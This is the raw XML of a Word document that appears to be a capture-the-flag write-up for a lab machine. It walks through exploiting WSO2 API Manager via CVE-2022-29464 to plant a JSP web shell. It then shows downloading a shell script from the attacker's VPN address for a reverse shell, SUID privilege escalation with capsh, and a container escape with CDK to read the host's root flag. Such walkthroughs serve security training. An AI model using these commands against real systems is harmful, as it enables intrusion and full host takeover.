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INTERFACE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kjt55i2j53q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determine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Ports:</w:t>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63800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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6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access port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9443</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but first we need to map the IP address to the domain name by adding a line to the hosts file, as illustrated in the image above.</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68"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accessing it again, we have the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WSO2 API Manager</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> service.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749800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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WSO2 is an open-source technology provider. It offers an enterprise platform for integrating application programming interfaces (API), applications, and web services locally and over the Internet. </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retrieve its version.</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60600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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version in hand, we can search for vulnerabilities affecting it. After some research, I found the following exploit.</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CVE-2022-29464</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unrestricted file upload</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proof of concept uploads a malicious </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.jsp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/fileupload/toolsAny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on the WSO2 web server. Due to a directory traversal issue affecting the upload file name, an attacker can write it to a location that allows command execution (RCE).</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Knowing this, we can execute the exploit below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>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https://github.com/hakivvi/CVE-2022-29464</w:t>
        </w:r>
      </w:hyperlink>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we can execute it:</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exploit.py https://api-manager.hackingclub.local:9443 cmd.jsp</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5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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/authenticationendpoint/cmd.jsp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> gives us our web shell.</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57400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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this point, we can obtain a reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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22500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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&lt;ip-vpn&gt;/shell.sh -o /tmp/shell.sh</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4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6">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2019300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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/tmp/shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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0" l="0" r="0" t="0"/>
            <wp:docPr id="6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a shell :</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5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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell TTY</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78000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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obtaining a TTY shell, I begin enumerating the server. The first thing I will do is search for binaries with the SUID bit set:</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find / -perm /4000 2&gt;/dev/null</w:t>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SUID on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">capsh</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binary:</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0" l="0" r="0" t="0"/>
            <wp:docPr id="5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o0399j47ovwy" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">capsh | GTFOBins</w:t>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https://gtfobins.github.io/gtfobins/capsh/#suid</w:t>
        </w:r>
      </w:hyperlink>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retrieve our first flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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27200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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f0srwaohz7uk" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privesc</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Docker Enumeration, Privilege Escalation, and Container Escape (DEEPCE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.pfgj0mqkgqdy" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/stealthcopter/deepce</w:t>
        </w:r>
      </w:hyperlink>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tool to my local machine, I can now transfer it to the server.</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6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execute it.</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62200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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usztp3cj0im" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Our Docker container was allocated with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cap_dac_read_search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checking the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">man </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">page for this capability, we can see that it allows the container to bypass file read permission checks and directory read/execute permission checks on the host file system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">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20217z36dwe6" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CAP_DAC_READ_SEARCH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">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Bypasses file read permission checks and directory read and execute permission checks.</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cdk</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool to assist us in this exploitation.</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CDK is an open-source container penetration testing toolkit designed to provide stable exploitation across different reduced containers without any operating system dependency. It comes with useful networking tools and many powerful PoCs/EXPs and helps you escape the container and easily take over the K8s cluster.</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hyperlink r:id="rId28">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/cdk-team/CDK</w:t>
        </w:r>
      </w:hyperlink>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repeat the same process of transferring the tool to the server.</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5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52"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tool on the server, we can read the final flag located in the root directory of the main host:</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./cdk_linux_amd64 run cap-dac-read-search /root/root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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6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thus, we successfully retrieve the final flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId32" w:type="default"/>
      <w:headerReference r:id="rId33" w:type="first"/>
      <w:headerReference r:id="rId34" w:type="even"/>
      <w:footerReference r:id="rId35" w:type="default"/>
      <w:footerReference r:id="rId36" w:type="first"/>
      <w:footerReference r:id="rId37"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7">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2"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8">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9">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9" name="image5.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image5.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Interface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9.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hyperlink" Target="https://gtfobins.github.io/gtfobins/capsh/#su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20.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/stealthcopter/deepce" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cdk-team/CDK"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4.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hakivvi/CVE-2022-29464" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image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rRA7XhzOVU0lNRgz/QCil0l/A==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLmtqdDU1aTJqNTNxYTIOaC5vMDM5OWo0N292d3kyDmguZjBzcndhb2h6N3VrMg5oLnBmZ2owbXFrZ3FkeTIOaC5idXN6dHAzY2owaW0yDmguMjAyMTd6MzZkd2U2Mg5oLjE3NWY1Y3M5NHowbzgAciExcmd2OXdVWkFNeG9ETExia0xwNHQ5WEhabjJiZ0IxW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